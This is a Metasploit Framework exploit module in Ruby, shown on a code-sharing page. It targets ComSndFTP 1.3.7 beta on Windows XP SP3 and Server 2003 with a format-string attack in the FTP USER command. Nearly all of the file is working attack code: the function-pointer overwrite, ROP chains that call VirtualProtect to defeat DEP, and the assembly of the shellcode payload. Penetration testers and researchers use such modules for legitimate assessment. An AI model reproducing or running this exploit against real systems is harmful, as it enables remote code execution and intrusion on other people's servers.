Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ftp/comsnd_ftpd_fmtstr.rb
23732 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10


11
  def initialize(info = {})

12
    super(

13
      update_info(

14
        info,

15
        'Name' => 'ComSndFTP v1.3.7 Beta USER Format String (Write4) Vulnerability',

16
        'Description' => %q{

17
          This module exploits the ComSndFTP FTP Server version 1.3.7 beta by sending a specially

18
          crafted format string specifier as a username. The crafted username is sent to the server to

19
          overwrite the hardcoded function pointer from Ws2_32.dll!WSACleanup. Once this function pointer

20
          is triggered, the code bypasses dep and then repairs the pointer to execute arbitrary code.

21
          The SEH exit function is preferred so that the administrators are not left with an unhandled

22
          exception message. When using the meterpreter payload, the process will never die, allowing

23
          for continuous exploitation.

24
        },

25
        'Author' => [

26
          'ChaoYi Huang <ChaoYi.Huang[at]connect.polyu.hk>', # vuln discovery + poc

27
          'rick2600 <rick2600[at]corelan.be>',               # msf module (target XP)

28
          'mr_me <mr_me[at]corelan.be>',                     # msf module (target 23k)

29
          'corelanc0d3r <peter.ve[at]corelan.be>'            # msf module

30
        ],

31
        'Arch' => [ ARCH_X86 ],

32
        'License' => MSF_LICENSE,

33
        'References' => [

34
          ['CVE', '2012-10055'],

35
          # When a DoS is NOT a DoS

36
          [ 'OSVDB', '82798'],

37
          [ 'EDB', '19024']

38
        ],

39
        'DefaultOptions' => {

40
          'EXITFUNC' => 'seh'

41
        },

42
        'Platform' => ['win'],

43
        'Privileged' => false,

44
        'Payload' => {

45
          'Space' => 1000,

46
          'BadChars' => "\x00\x0a\x0d",

47
          'StackAdjustment' => -3500,

48
          'DisableNops' => true

49
        },

50
        'Targets' => [

51
          [

52
            'Windows XP SP3 - English',

53
            {

54
              'Functionpointer' => 0x71AC4050,  # winsock pointer

55
              'Functionaddress' => 0x71AB2636,  # the repair address

56
              'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn

57
              'Pad' => 568

58
            }

59
          ],

60
          [

61
            'Windows Server 2003 - English',

62
            {

63
              'Functionpointer' => 0x71C14044,  # winsock pointer

64
              'Functionaddress' => 0x71C02661,  # the repair address

65
              'Pivot' => 0x00408D16, # 0x004093AE-0x698 add esp, 72c ; retn

66
              'Pad' => 568

67
            }

68
          ]

69
        ],

70
        'DisclosureDate' => '2012-06-08',

71
        'Notes' => {

72
          'Reliability' => UNKNOWN_RELIABILITY,

73
          'Stability' => UNKNOWN_STABILITY,

74
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

75
        }

76
      )

77
    )

78


79
    register_options(

80
      [

81
        Opt::RPORT(21),

82
      ]

83
    )

84
  end

85


86
  def check

87
    connect

88
    banner = sock.get_once || ""

89
    disconnect

90


91
    validate = "\x32\x32\x30\x20\xbb\xb6\xd3\xad\xb9"

92
    validate << "\xe2\xc1\xd9\x46\x54\x50\xb7\xfe\xce"

93
    validate << "\xf1\xc6\xf7\x21\x0d\x0a"

94


95
    if banner.to_s == validate

96
      return Exploit::CheckCode::Vulnerable

97
    end

98


99
    return Exploit::CheckCode::Safe

100
  end

101


102
  def junk(n = 4)

103
    return rand_text_alpha(n).unpack("V").first

104
  end

105


106
  def exploit

107
    rop = ''

108
    if target.name =~ /Server 2003/

109
      # C:\WINDOWS\system32\msvcrt.dll v7.0.3790.3959

110
      rop = [

111
        0x77be3adb, # pop eax ; retn

112
        0x77ba1114, # <- *&VirtualProtect()

113
        0x77bbf244, # mov eax,[eax] ; pop ebp ; retn

114
        junk,

115
        0x77bb0c86, # xchg eax,esi ; retn

116
        0x77be3adb, # pop eax ; retn

117
        0xFFFFFBFF, # dwSize

118
        0x77BAD64D, # neg eax ; pop ebp ; retn

119
        junk,

120
        0x77BBF102, # xchg eax,ebx ; add [eax],al ; retn

121
        0x77bbfc02, # pop ecx ; retn

122
        0x77bef001, # ptr that is w+

123
        0x77bd8c04, # pop edi ; retn

124
        0x77bd8c05, # retn

125
        0x77be3adb, # pop eax ; retn

126
        0xFFFFFFC0, # flNewProtect

127
        0x77BAD64D, # neg eax ; pop ebp ; retn

128
        0x77be2265, # ptr to 'push esp ; ret'

129
        0x77BB8285, # xchg eax,edx ; retn

130
        0x77be3adb, # pop eax ; retn

131
        0x90909090, # nops

132
        0x77be6591, # pushad ; add al,0ef ; retn

133
      ].pack("V*")

134


135
    elsif target.name =~ /XP SP3/

136
      # C:\WINDOWS\system32\msvcrt.dll v7.0.2600.5512

137
      rop = [

138
        0x77C21D16, # pop eax ; retn

139
        0x77C11120, # <- *&VirtualProtect()

140
        0x77C2E493, # mov eax,[eax] ; pop ebp ; retn

141
        junk,

142
        0x77C21891, # pop esi ; retn

143
        0x77C5D010, # ptr that is w+

144
        0x77C2DD6C, # xchg eax,esi ; add [eax],al; retn

145
        0x77C21D16, # pop eax ; retn

146
        0xFFFFFBFF, # dwSize

147
        0x77C1BE18, # neg eax ; pop ebp ; retn

148
        junk,

149
        0x77C2362C, # pop ebx ; retn

150
        0x77C5D010, # ptr that is w+

151
        0x77C2E071, # xchg eax,ebx ; add [eax],al ; retn

152
        0x77C1F519, # pop ecx ; retn

153
        0x77C5D010, # ptr that is w+

154
        0x77C23B47, # pop edi ; retn

155
        0x77C23B48, # retn

156
        0x77C21D16, # pop eax ; retn

157
        0xFFFFFFC0, # flNewProtect

158
        0x77C1BE18, # neg eax ; pop ebp ; retn

159
        0x77C35459, # ptr to 'push esp ; ret'

160
        0x77C58FBC, # xchg eax,edx ; retn

161
        0x77C21D16, # pop eax ; retn

162
        0x90909090, # nops

163
        0x77C567F0, # pushad ; add al,0ef ; retn

164
      ].pack("V*")

165
    end

166


167
    stage1 = %Q{

168
      mov eax, #{target['Functionpointer']}

169
      mov ecx, #{target['Functionaddress']}

170
      mov [eax], ecx

171
    }

172


173
    offset_wp = rand_text_alphanumeric(1)

174
    pivot = target['Pivot']

175
    offset = target['Pad'] + rop.length + stage1.length + payload.encoded.length

176


177
    attackstring = rand_text_alphanumeric(7)

178
    attackstring << [target['Functionpointer']].pack('V')

179
    attackstring << "%#{pivot}x" # special pointer to our pivot

180
    attackstring << "%p" * 208 + "#{offset_wp}%n" # format specifiers to read and write the function pointer

181
    attackstring << rand_text_alphanumeric(target['Pad'])

182
    attackstring << rop

183
    attackstring << Metasm::Shellcode.assemble(Metasm::Ia32.new, stage1).encode_string

184
    attackstring << payload.encoded

185
    attackstring << rand_text_alphanumeric(2000 - offset)

186
    attackstring << "\r\n"

187


188
    sploit = "USER #{attackstring}\r\n"

189


190
    print_status("Triggering overflow...")

191
    connect

192
    sock.get_once(1024)

193
    sock.put(sploit)

194
    select(nil, nil, nil, 2)

195
    handler

196
    disconnect

197
  end

198
end

199


200